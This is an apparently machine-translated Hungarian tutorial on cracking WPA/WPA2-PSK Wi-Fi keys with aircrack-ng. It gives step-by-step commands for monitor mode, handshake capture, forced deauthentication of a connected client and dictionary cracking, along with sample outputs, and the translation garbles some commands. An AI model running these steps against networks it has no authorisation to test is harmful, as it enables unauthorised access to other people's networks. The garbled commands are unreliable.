Hogyan lehet feltörni wpa

Ez a kézikönyv leírja, hogy betörjön védett hálózatban WPA / WPA2 Pre-Shared Key (PSK). WPA / WPA2 támogat sok más hitelesítési módszerek, de aircrack-ng csapkod PSK csak, úgyhogy győződjön meg róla, airodump-ng megjelenik a hálózati hitelesítési típus PSK. Egyébként nem is próbálkoznak bejutni.







Van egy fontos különbség a törés WPA / WPA2 és WEP. Ha a WEP, hogy felgyorsítsa a törési folyamat statisztikai módszerekkel, WPA lehet repedt brute force egyedül. Ez annak köszönhető, hogy a hiánya egy állandó kulcs, így a gyűjtemény a kezdeti vektor (IV) nem gyorsítja fel a krakkolási folyamatot, mivel ez egy támadás a WEP. Az egyetlen módja, hogy a megfelelő információt - kezdődik elfog csomagokat egy csatlakozási pont között, az ügyfél és az AP között. Egy kapcsolat létesítését zajlik abban a pillanatban, amikor egy ügyfél belép a hálózatba (ez nem egészen igaz, de az összefüggésben ezt a dokumentumot, azt fogják irányítani ezt). A hossza a PSK lehet 8-63 karakter, és a minél nagyobb, annál kisebb a valószínűsége a sikeres törés.

De minden nem reménytelen. Ha a kulcs a szótári szó, vagy legalább 8 karakter, törés lehetséges. Ennélfogva, az úton, persze, hogyan lehet létrehozni egy törhetetlen lánc - elég ahhoz, hogy a WPA / WPA2 és a kulcs hossza 63 bájt, amely egy véletlenszerűen választott betűk, számok és psevdosimvolov.

Különbségek a WPA és WPA2 betörés van, hogy ugyanazt a hitelesítést, így ugyanazt a technológiát.

Ellenőrizze, hogy minden feltétel teljesül, különben az alábbi tippeket nem valószínű, hogy segítsen. Továbbá ne felejtsük el, hogy cserélje ath0 a vezeték nélküli kártya interfész neve.

Annak ellenőrzésére, a kézi otthon, akkor szükség van a két vezeték nélküli kártya. Használjuk az alábbi eszközöket:

• Uke kliens WPA2:
- MAC: 00: 0F: B5: FD: FB: C2
• AP:
- ESSID: teddy
- MAC: 00: 14: 6C: 7E: 40: 80
- Channel: 9
• aircrack-ng rendszer:
- MAC: 00: 0F: B5: 88: AC: 82

A cél -, hogy elfog csomagokat létesítése során a biztonságos kapcsolatot, és használja aircrack-ng feltörni a PSK. Lehetőség van, hogy az aktív és passzív módon. Aktív hogy küldje a csomagot az ügyfél deautentifikatsionnogo passzív - várja meg, amíg az ügyfél elkezdi beállítani a WPA / WPA2 kapcsolatot magad. Az előnye, hogy a passzív módszer, hogy nincs szükség az injekció, így a támadás megvalósítása lehetséges és Windows alatt.

Itt vannak a alapvető lépéseket:
- Indítsa el a vezeték nélküli interfész monitor módban az AP csatornán;
- futtattunk ugyanazon airodump-ng csatornaszűrő szerinti BSSID;
- használat aireplay-ng, hogy deautentifitsirovat vezeték nélküli kliens;
- kezelhető aircrack-ng feltörni kulcs PSK.

1. lépés: Indítsa el a vezeték nélküli interfész monitor módban

Ahhoz, hogy start stop ath0:

# Airmon-ng megálló ath0

Interface Chipset illesztőprogram

wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (szülő: wifi0) (VAP elpusztult)

Ügyeljen arra, hogy más athX interfészek:

lo nincs vezeték nélküli kiterjesztéseket.
eth0 nincs vezeték nélküli kiterjesztéseket.
wifi0 nincs vezeték nélküli kiterjesztéseket.

Ha más athX jelen, megállítani őket is. Most állítsa be a vezeték nélküli kártya csatornán 9 monitor módban:

# Airmon-ng indul wifi0 9

Ebben a parancsban használjuk «wifi0», hanem a szokásos «ath0», mert a madwifi-ng driver. A válasz valami olyasmi lesz:

Interface Chipset illesztőprogram

wifi0 Atheros madwifi-ng






ath0 Atheros madwifi-ng VAP (szülő: wifi0) (monitor mód engedélyezve)

Jegyezze fel a monitor mód. Annak ellenőrzésére, hogy a felület megfelelően konfigurált, fuss:

lo nincs vezeték nélküli kiterjesztéseket.
wifi0 nincs vezeték nélküli kiterjesztéseket.
eth0 nincs vezeték nélküli kiterjesztéseket.
ath0 IEEE 802.11g ESSID: »» Becenév: »»
Mode: Monitor frekvencia: 2,452 GHz Access Point: 00: 0F: B5: 88: AC: 82
Bit Rate: 0 kb / s Tx-Power: 18 dBm Érzékenység = 0/3
Próbálja újra: ki RTS thr: off töredék thr: off
A titkosítási kulcs: off
Power Management: off
Link Quality = 0/94 jelszint = -95 dBm Noise level = -95 dBm
Rx érvénytelen nwid: 0 Rx érvénytelen kripta: 0 Rx érvénytelen frag: 0
Tx túlzott ismétlések: 0 Érvénytelen misc: 0 Missed beacon: 0

E lépés - elkapni a pillanatot, az AP a biztonságos kapcsolat létrehozásához.

# Airodump-ng -c -bssid 9 00: 14: 6C: 7E: 40: 80 -w PSK ath0

Fontos: Ne használja a -ivs. Be kell, hogy rögzítse a csomagokat teljes egészében. Tehát, ha a kliens csatlakozik a ponton, akkor valami ilyesmit:

BSSID PWR RXQ lámpákhoz #data, # / s CH MB ENC CIPHER AUTH ESSID

00: 14: 6C: 7E: 40: 80 39 100 51 116 14 9 54 WPA2 CCMP PSK teddy

BSSID STATION PWR elveszett csomagok szondák

00: 14: 6C: 7E: 40: 80 00: 0F: B5: FD: FB: C2 35 0116

És ha az ügyfél már nem aktív, akkor:

BSSID PWR RXQ lámpákhoz #data, # / s CH MB ENC CIPHER AUTH ESSID

00: 14: 6C: 7E: 40: 80 39 100 51 0 0 9 54 WPA2 CCMP PSK teddy

Annak megadása, hogy néha elkapni a pillanatot, a csatlakozás végrehajtásához szükséges további gesztusok. A kártya kell ugyanabban a módban, hogy az AP és a kliens eszköz. Például, ha a kártya a B módban, és az ügyfél - a módban a G, majd elkapni a hitelesítés nem fog működni. Néha szükség lehet beállítani ugyanolyan sebességgel, például 11 ​​MB vagy 54 MB. Általában, ha ez nem volt lehetséges, hogy elkapjam a kapcsolat beállításához egyszerre, ki kell tapasztalni.

3. lépés: használja aireplay-ng, hogy húzza ki a kliens.

Ez a lépés nem kötelező, és végre csak abban az esetben, ha azt szeretné, hogy gyorsítsák fel a elegy. Természetesen ahhoz, hogy hajtsa végre a következő műveleteket kell, hogy legyen legalább egy kliens volt kötve a lényeg. Ha jelenleg nincs vezeték nélküli kliensek nincsenek ott, pihenni, és közvetlenül a következő lépésben. Természetesen, ha a jövőben a vezeték nélküli kliens, semmi sem akadályozza meg, hogy menjen vissza, és töltse ki az összes alábbi parancsokat.

Tehát ezen a ponton küldünk a vezeték nélküli üzenetet küld a kliensnek, hogy ő már nem jár az AP. Az ügyfél megkísérli helyreállítani a kapcsolatot, és küldje csak ezeket a csomagokat, hogy szükségünk van.

Az adatok alapján nyert az előző lépésben, végre egy másik konzolon a következő parancsot:

# Aireplay-ng -0 -a 1 00: 14: 6C: 7E: 40: 80 -c 00: 0F: B5: FD: FB: C2 ath0

A válasz lehet:

11:09:28 küldése DeAuth állomás - STMAC: [34: 30: 30 00: 0F: B5]

Deautentifikatsionny csomagot küld közvetlenül a számítógépről a kliens számítógépre, úgyhogy győződjön meg róla, hogy közel ahhoz, hogy az utóbbi.

4. lépés: futtatni a aircrack-ng és megtöri PSK kulcs.

E lépés -, hogy megpróbálja feltörni a PSK kulcs kiválasztásával szótárban. Kis szótár jön aircrack-ng (password.lst), nagyobb térfogatú szótárak könnyen megtalálható online, vagy létrehozhatja saját segítségével jól ismert program John the Ripper.

Nyisson meg egy új konzolt, és futtassa:

# Aircrack-ng -w password.lst -B 00: 14: 6C: 7E: 40: 80 PSK * .cap

-w password.lst hozzárendel egy fájlnevet a szótárban
PSK * .cap hozzárendel egy fájlnevet elfogott csomagokat. A maszk „*” használják, mint a fájl nem lehet egyedül.

Ha a hitelesítési csomagok nem találtak, a kiadási hasonló lesz a következő:

Nyitva PSK-01.cap
Nyitva PSK-02.cap
Nyitva PSK-03.cap
Olvasd 1827 csomagokat.
Nincs érvényes WPA kézfogás talált.

Ha ez történik, próbálja megismételni a harmadik lépés, és újra ütni a vezeték nélküli kliens a hálózat, hogy ismételje meg az eljárást a kapcsolat létesítésekor. Ha egy passzív módszer gyűjtőcsomagolás, várjon tovább, amíg az ügyfél kerül létesít kapcsolatot. A következtetés esetében megtalálni a megfelelő csomag lesz:

Nyitva PSK-01.cap
Nyitva PSK-02.cap
Nyitva PSK-03.cap
Nyitva PSK-04.cap
Olvasd 1827 csomagokat.

# BSSID ESSID Encryption

1 00: 14: 6C: 7E: 40: 80 Teddy WPA (1 handshake)

A választás első hálózati célként.

Ettől a pillanattól kezdve aircrack-ng indulhat hacker PSK kulcsot. Attól függően, hogy a processzor sebességét és a méret a szótárban, ez a folyamat eltarthat óra vagy nap alatt. Sikeres hackelés gomb így néz ki:
Aircrack-ng 0.8

[00:00:00] 2 kulccsal vizsgált (37,20 k / s)

KEY található! [12345678]

Master Key. CD 69 0D 11 8E AC AA C5 C5 EK BB 59 85 49 3E 7D

B8 A6 C5 4A 13 72 82 38 ED C3 7E 2C 59 5E AB FD

Transcient Key. 06 F8 BB F3 B1 AE EE 1F 55 66 AE 51 12 98 1F F8

CE 8A 9D A0 FC ED A6 DE 70 84 BA 90 83 40 7E CD

E1 FF 1D 41 65 17 93 0E 64 32 BF 25 50 D5 4A 5E

2B 8C EA 20 90 32 15 A6 26 62 93 27 66 66 E0 71

EAPOL HMAC. 4E 27 D9 5B 00 91 53 57 88 9C 66 29 C8 B1 D1 CB




Kapcsolódó cikkek